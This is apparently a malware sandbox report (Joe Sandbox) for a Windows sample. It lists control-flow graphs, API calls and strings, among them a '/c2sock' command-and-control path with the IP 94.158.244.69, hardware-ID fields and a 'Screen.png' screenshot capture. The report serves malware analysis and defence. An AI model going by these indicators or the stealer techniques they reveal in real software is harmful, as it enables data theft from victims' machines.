                                                          control_flow_graph 5809 41a28f-41a2c9 call 447e24 call 44568a 5814 41a2cc-41a2d4 5809->5814 5815 41a341-41a346 5814->5815 5816 41a2d6-41a2db 5814->5816 5817 41a34c-41a351 5815->5817 5818 41a40e-41a413 5815->5818 5819 41a2e1-41a2e6 5816->5819 5820 41a3c5-41a3ca 5816->5820 5823 41a357-41a35c 5817->5823 5824 41a4b8-41a4bd 5817->5824 5825 41a419-41a41e 5818->5825 5826 41a53a-41a53f 5818->5826 5827 41a458-41a45d 5819->5827 5828 41a2ec-41a2f1 5819->5828 5821 41a3d0-41a3d5 5820->5821 5822 41a4f7-41a4fc 5820->5822 5831 41a5cb-41a5d0 5821->5831 5832 41a3db-41a3e0 5821->5832 5839 41a502-41a507 5822->5839 5840 41a6c9-41a6ce 5822->5840 5835 41a362-41a367 5823->5835 5836 41a5a5-41a5aa 5823->5836 5833 41a6a1-41a6a6 5824->5833 5834 41a4c3-41a4c8 5824->5834 5837 41a424-41a429 5825->5837 5838 41a5ed-41a5f2 5825->5838 5829 41a705-41a70a 5826->5829 5830 41a545-41a54a 5826->5830 5841 41a463-41a468 5827->5841 5842 41a635-41a63a 5827->5842 5843 41a2f7-41a2fc 5828->5843 5844 41a578-41a57d 5828->5844 5853 41a9c0-41a9cb 5829->5853 5854 41a710-41a715 5829->5854 5845 41a550-41a555 5830->5845 5846 41a886-41a89c call 41941d call 419473 5830->5846 5859 41a936-41a94c 5831->5859 5860 41a5d6-41a5db 5831->5860 5847 41a797-41a7bf 5832->5847 5848 41a3e6-41a3eb 5832->5848 5875 41a992-41a999 5833->5875 5876 41a6ac-41a6b1 5833->5876 5869 41a80e-41a828 call 41c270 call 41f9a4 5834->5869 5870 41a4ce-41a4d3 5834->5870 5871 41a758-41a771 5835->5871 5872 41a36d-41a372 5835->5872 5857 41a5b0-41a5b5 5836->5857 5858 41a902-41a909 5836->5858 5855 41a7db-41a7e2 5837->5855 5856 41a42f-41a434 5837->5856 5865 41a951-41a970 5838->5865 5866 41a5f8-41a5fd 5838->5866 5873 41a50d-41a512 5839->5873 5874 41a85f-41a866 5839->5874 5849 41a6d4-41a6d9 5840->5849 5850 41a99e-41a9a9 call 447e24 5840->5850 5861 41a7e7-41a7ee 5841->5861 5862 41a46e-41a473 5841->5862 5867 41a640-41a645 5842->5867 5868 41a97f-41a98d 5842->5868 5863 41a302-41a307 5843->5863 5864 41a727-41a735 5843->5864 5851 41a583-41a588 5844->5851 5852 41aa24-41aa2b 5844->5852 5877 41a8b6-41a8e6 5845->5877 5878 41a55b-41a560 5845->5878 5946 41a8a1-41a8b1 5846->5946 5884 41a977-41a97a 5847->5884 5905 41a7c5-41a7ca 5847->5905 5897 41a3f1-41a3f6 5848->5897 5898 41a7cf-41a7d6 5848->5898 5849->5814 5899 41a6df-41a700 call 41b251 5849->5899 5919 41a9ae-41a9bb 5850->5919 5879 41a8f6-41a8fd 5851->5879 5880 41a58e-41a593 5851->5880 5852->5814 5891 41a9cd-41a9d5 5853->5891 5892 41a9ec-41aa15 5853->5892 5854->5814 5900 41a71b-41a722 5854->5900 5855->5814 5901 41a9d7-41a9da 5856->5901 5902 41a43a-41a43f 5856->5902 5881 41a5bb-41a5c0 5857->5881 5882 41a90e-41a931 call 447e2f 5857->5882 5858->5814 5859->5814 5885 41a5e1-41a5e8 5860->5885 5886 41aa30-41aa35 5860->5886 5861->5814 5903 41a7f3-41a809 5862->5903 5904 41a479-41a47e 5862->5904 5887 41a73a-41a748 5863->5887 5888 41a30d-41a312 5863->5888 5864->5814 5883 41a972 5865->5883 5865->5884 5866->5814 5890 41a603-41a625 5866->5890 5867->5814 5893 41a64b call 41d057 5867->5893 5868->5814 5950 41a82d-41a834 5869->5950 5907 41a839-41a85a 5870->5907 5908 41a4d9-41a4de 5870->5908 5871->5814 5894 41a776-41a787 5872->5894 5895 41a378-41a37d 5872->5895 5909 41a518-41a51d 5873->5909 5910 41a86b-41a876 5873->5910 5874->5814 5875->5814 5876->5814 5896 41a6b7-41a6c4 5876->5896 5877->5884 5914 41a8ec-41a8f1 5877->5914 5878->5814 5913 41a566-41a573 5878->5913 5879->5814 5880->5814 5915 41a599-41a5a0 5880->5915 5881->5892 5917 41a5c6 5881->5917 5882->5814 5883->5884 5884->5814 5885->5814 5886->5814 5926 41aa3b-41aa48 5886->5926 5887->5884 5930 41a74e-41a753 5887->5930 5888->5814 5918 41a314-41a331 5888->5918 5890->5884 5920 41a62b-41a630 5890->5920 5891->5852 5891->5901 5923 41aa17 5892->5923 5924 41aa1c-41aa1f 5892->5924 5940 41a650-41a69c call 41aa49 * 3 5893->5940 5894->5884 5931 41a78d-41a792 5894->5931 5895->5814 5925 41a383-41a3b5 call 41592c call 41900a 5895->5925 5896->5814 5897->5814 5927 41a3fc-41a409 5897->5927 5898->5814 5899->5814 5900->5814 5922 41a9db 5901->5922 5902->5814 5929 41a445-41a453 5902->5929 5903->5814 5904->5814 5932 41a484-41a4a8 call 41604a 5904->5932 5905->5884 5907->5814 5908->5814 5934 41a4e4-41a4f2 5908->5934 5909->5814 5935 41a523-41a526 call 447a80 5909->5935 5910->5884 5936 41a87c-41a881 5910->5936 5913->5814 5914->5884 5915->5814 5917->5814 5918->5884 5939 41a337-41a33c 5918->5939 5919->5814 5920->5884 5922->5922 5923->5924 5924->5814 5925->5884 5958 41a3bb-41a3c0 5925->5958 5927->5814 5929->5814 5930->5884 5931->5884 5932->5884 5954 41a4ae-41a4b3 5932->5954 5934->5814 5951 41a52b-41a535 5935->5951 5936->5884 5939->5884 5940->5814 5946->5814 5950->5814 5951->5814 5954->5884 5958->5884
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wctomb_s
                                                          • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                          • API String ID: 2865277502-1332857675
                                                          • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                          • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                          • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                          • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6110 233003c-2330047 6111 2330049 6110->6111 6112 233004c-2330263 call 2330a3f call 2330e0f call 2330d90 VirtualAlloc 6110->6112 6111->6112 6127 2330265-2330289 call 2330a69 6112->6127 6128 233028b-2330292 6112->6128 6132 23302ce-23303c2 VirtualProtect call 2330cce call 2330ce7 6127->6132 6130 23302a1-23302b0 6128->6130 6131 23302b2-23302cc 6130->6131 6130->6132 6131->6130 6139 23303d1-23303e0 6132->6139 6140 23303e2-2330437 call 2330ce7 6139->6140 6141 2330439-23304b8 VirtualFree 6139->6141 6140->6139 6143 23305f4-23305fe 6141->6143 6144 23304be-23304cd 6141->6144 6147 2330604-233060d 6143->6147 6148 233077f-2330789 6143->6148 6146 23304d3-23304dd 6144->6146 6146->6143 6153 23304e3-2330505 LoadLibraryA 6146->6153 6147->6148 6149 2330613-2330637 6147->6149 6151 23307a6-23307b0 6148->6151 6152 233078b-23307a3 6148->6152 6154 233063e-2330648 6149->6154 6155 23307b6-23307cb 6151->6155 6156 233086e-23308be LoadLibraryA 6151->6156 6152->6151 6157 2330517-2330520 6153->6157 6158 2330507-2330515 6153->6158 6154->6148 6161 233064e-233065a 6154->6161 6159 23307d2-23307d5 6155->6159 6166 23308c7-23308f9 6156->6166 6160 2330526-2330547 6157->6160 6158->6160 6162 23307d7-23307e0 6159->6162 6163 2330824-2330833 6159->6163 6164 233054d-2330550 6160->6164 6161->6148 6165 2330660-233066a 6161->6165 6167 23307e2 6162->6167 6168 23307e4-2330822 6162->6168 6172 2330839-233083c 6163->6172 6169 23305e0-23305ef 6164->6169 6170 2330556-233056b 6164->6170 6171 233067a-2330689 6165->6171 6173 2330902-233091d 6166->6173 6174 23308fb-2330901 6166->6174 6167->6163 6168->6159 6169->6146 6175 233056f-233057a 6170->6175 6176 233056d 6170->6176 6177 2330750-233077a 6171->6177 6178 233068f-23306b2 6171->6178 6172->6156 6179 233083e-2330847 6172->6179 6174->6173 6181 233059b-23305bb 6175->6181 6182 233057c-2330599 6175->6182 6176->6169 6177->6154 6183 23306b4-23306ed 6178->6183 6184 23306ef-23306fc 6178->6184 6185 233084b-233086c 6179->6185 6186 2330849 6179->6186 6193 23305bd-23305db 6181->6193 6182->6193 6183->6184 6187 233074b 6184->6187 6188 23306fe-2330748 6184->6188 6185->6172 6186->6156 6187->6171 6188->6187 6193->6164
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0233024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: 630cfdc9f68c4602c6f9e054d7463fb40ce5c3a582782d687d0597b05b959f97
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 98526A75A01229DFDB65CF68C984BACBBB5BF09304F1480D9E94DAB351DB30AA85CF14

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6335 432718-43272b 6336 43272e-432736 6335->6336 6337 432771-432776 6336->6337 6338 432738-43273d 6336->6338 6341 432821-432826 6337->6341 6342 43277c-432781 6337->6342 6339 432743-432748 6338->6339 6340 4327f0-4327f5 6338->6340 6343 432872-432877 6339->6343 6344 43274e-432753 6339->6344 6345 4327fb-432800 6340->6345 6346 4328e9-4328ee 6340->6346 6347 432910-432915 6341->6347 6348 43282c-432831 6341->6348 6349 432787-43278c 6342->6349 6350 4328a9-4328ae 6342->6350 6351 432a76-432a8d CreateCompatibleBitmap 6343->6351 6352 43287d-432882 6343->6352 6353 432979-43298f 6344->6353 6354 432759-43275e 6344->6354 6355 432806-43280b 6345->6355 6356 4329fc-432a09 6345->6356 6361 4328f4-4328f9 6346->6361 6362 432ace-432adf 6346->6362 6365 432ae4-432aeb 6347->6365 6366 43291b-432920 6347->6366 6359 432837-43283c 6348->6359 6360 432a26-432a52 BitBlt 6348->6360 6363 432792-432797 6349->6363 6364 4329d8-4329eb 6349->6364 6357 4328b0-4328b5 6350->6357 6358 4328d6-4328e4 6350->6358 6351->6336 6374 432a92-432abf call 4338b5 call 43350d 6352->6374 6375 432888-43288d 6352->6375 6353->6336 6376 432994-4329d3 call 430e6c * 2 6354->6376 6377 432764-432769 6354->6377 6368 432811-432816 6355->6368 6369 432a0e-432a21 SelectObject 6355->6369 6356->6336 6378 432af0-432af5 6357->6378 6379 4328bb-4328c6 6357->6379 6358->6336 6370 432842-432847 6359->6370 6371 432a5b-432a71 SelectObject 6359->6371 6372 432ac6-432ac9 6360->6372 6373 432a54-432a59 6360->6373 6361->6336 6380 4328ff-43290b 6361->6380 6362->6336 6381 4329f0-4329f7 6363->6381 6382 43279d-4327a2 6363->6382 6364->6336 6365->6336 6366->6336 6367 432926-432934 6366->6367 6383 432936 6367->6383 6384 43293b-43293e 6367->6384 6385 43295b-432974 6368->6385 6386 43281c 6368->6386 6369->6336 6370->6336 6388 43284d-432863 call 432b1b 6370->6388 6371->6336 6372->6336 6373->6372 6374->6372 6411 432ac1 6374->6411 6375->6336 6390 432893-4328a4 CreateCompatibleDC 6375->6390 6376->6336 6391 432943-432946 6377->6391 6392 43276f 6377->6392 6378->6336 6394 432afb-432b1a DeleteDC DeleteObject 6378->6394 6379->6391 6393 4328c8-4328d0 6379->6393 6380->6336 6381->6336 6382->6336 6395 4327a4-4327e0 call 4338b5 call 432718 6382->6395 6383->6384 6384->6372 6385->6336 6386->6336 6407 432865 6388->6407 6408 43286a-43286d 6388->6408 6390->6336 6396 432947 6391->6396 6392->6336 6393->6358 6393->6385 6395->6372 6412 4327e6-4327eb 6395->6412 6396->6396 6407->6408 6408->6372 6411->6372 6412->6372
                                                          APIs
                                                          • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                          • DeleteDC.GDI32(00000002), ref: 00432B01
                                                          • DeleteObject.GDI32(?), ref: 00432B0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$CompatibleCreateObject
                                                          • String ID:
                                                          • API String ID: 1022343127-0
                                                          • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                          • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                          • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                          • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6413 44cf15-44cf21 6414 44cfb3-44cfb6 6413->6414 6415 44cf26-44cf37 6414->6415 6416 44cfbc 6414->6416 6418 44cf44-44cf5d LoadLibraryExW 6415->6418 6419 44cf39-44cf3c 6415->6419 6417 44cfbe-44cfc2 6416->6417 6422 44cfc3-44cfd3 6418->6422 6423 44cf5f-44cf68 GetLastError 6418->6423 6420 44cf42 6419->6420 6421 44cfdc-44cfde 6419->6421 6425 44cfb0 6420->6425 6421->6417 6422->6421 6424 44cfd5-44cfd6 FreeLibrary 6422->6424 6426 44cfa1-44cfae 6423->6426 6427 44cf6a-44cf7c call 4516ce 6423->6427 6424->6421 6425->6414 6426->6425 6427->6426 6430 44cf7e-44cf90 call 4516ce 6427->6430 6430->6426 6433 44cf92-44cf9f LoadLibraryExW 6430->6433 6433->6422 6433->6426
                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3664257935-537541572
                                                          • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                          • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                          • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                          • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6677 44575f-445778 6679 44578d-44579d 6677->6679 6680 44577a-44578b call 4447a4 call 44e2f7 6677->6680 6681 4457b2-4457b8 6679->6681 6682 44579f-4457b0 call 4447a4 call 44e2f7 6679->6682 6700 4457e0-4457e2 6680->6700 6686 4457c0-4457c6 6681->6686 6687 4457ba 6681->6687 6705 4457df 6682->6705 6692 4457e3 call 453aae 6686->6692 6693 4457c8 6686->6693 6690 4457d2-4457dc call 4447a4 6687->6690 6691 4457bc-4457be 6687->6691 6703 4457de 6690->6703 6691->6686 6691->6690 6701 4457e8-4457fd call 453711 6692->6701 6693->6690 6698 4457ca-4457d0 6693->6698 6698->6690 6698->6692 6707 445803-44580f call 45373d 6701->6707 6708 4459ee-4459f8 call 44e307 6701->6708 6703->6705 6705->6700 6707->6708 6713 445815-445821 call 453769 6707->6713 6713->6708 6716 445827-44583c 6713->6716 6717 4458ac-4458b7 call 4537d0 6716->6717 6718 44583e 6716->6718 6717->6703 6724 4458bd-4458c8 6717->6724 6719 445840-445846 6718->6719 6720 445848-445864 call 4537d0 6718->6720 6719->6717 6719->6720 6720->6703 6728 44586a-44586d 6720->6728 6726 4458e4 6724->6726 6727 4458ca-4458d3 call 453a5a 6724->6727 6730 4458e7-4458fb call 4543d0 6726->6730 6727->6726 6736 4458d5-4458e2 6727->6736 6731 4459e7-4459e9 6728->6731 6732 445873-44587c call 453a5a 6728->6732 6739 4458fd-445905 6730->6739 6740 445908-44592f call 4527e0 call 4543d0 6730->6740 6731->6703 6732->6731 6741 445882-44589a call 4537d0 6732->6741 6736->6730 6739->6740 6749 445931-44593a 6740->6749 6750 44593d-445964 call 4527e0 call 4543d0 6740->6750 6741->6703 6746 4458a0-4458a7 6741->6746 6746->6731 6749->6750 6755 445966-44596f 6750->6755 6756 445972-445981 call 4527e0 6750->6756 6755->6756 6759 445983 6756->6759 6760 4459a9-4459c7 6756->6760 6763 445985-445987 6759->6763 6764 445989-44599d 6759->6764 6761 4459e4 6760->6761 6762 4459c9-4459e2 6760->6762 6761->6731 6762->6731 6763->6764 6765 44599f-4459a1 6763->6765 6764->6731 6765->6731 6766 4459a3 6765->6766 6766->6760 6767 4459a5-4459a7 6766->6767 6767->6731 6767->6760
                                                          APIs
                                                          • __allrem.LIBCMT ref: 004458F2
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                          • __allrem.LIBCMT ref: 00445925
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                          • __allrem.LIBCMT ref: 0044595A
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                          • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                          • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                          • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9a%^$M%$Screen.png
                                                          • API String ID: 0-2021954137
                                                          • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                          • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                          • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                          • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                          • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: advapi32.dll$my-global-render.dll
                                                          • API String ID: 1029625771-772900288
                                                          • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                          • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                          • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                          • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^^4$^^4$~rjz
                                                          • API String ID: 0-2511145224
                                                          • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                          • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                          • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                          • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                          APIs
                                                          • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                            • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharInformationMultiTimeWideZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 1123094072-239921721
                                                          • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                          • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                          • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                          • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,58C6AD3B,?,0044387B), ref: 004439CB
                                                          • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,58C6AD3B,?,0044387B), ref: 004439D2
                                                          • ExitProcess.KERNEL32 ref: 004439E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                          • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                          • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                          • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                          APIs
                                                          • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProfile
                                                          • String ID: advapi32.dll
                                                          • API String ID: 2104809126-4050573280
                                                          • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                          • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                          • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                          • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                          • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 485612231-0
                                                          • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                          • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                          • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                          • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02330223,?,?), ref: 02330E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02330223,?,?), ref: 02330E1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: 14945b82f04acc9c5ca6033de40102e9104dd1cbd9b006f498a6056a38369535
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: 07D01232245228B7DB013A94DC09BCEBB5CDF09BA6F008021FB0DE9080CBB09A4046EA
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                          • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                          • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                          • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
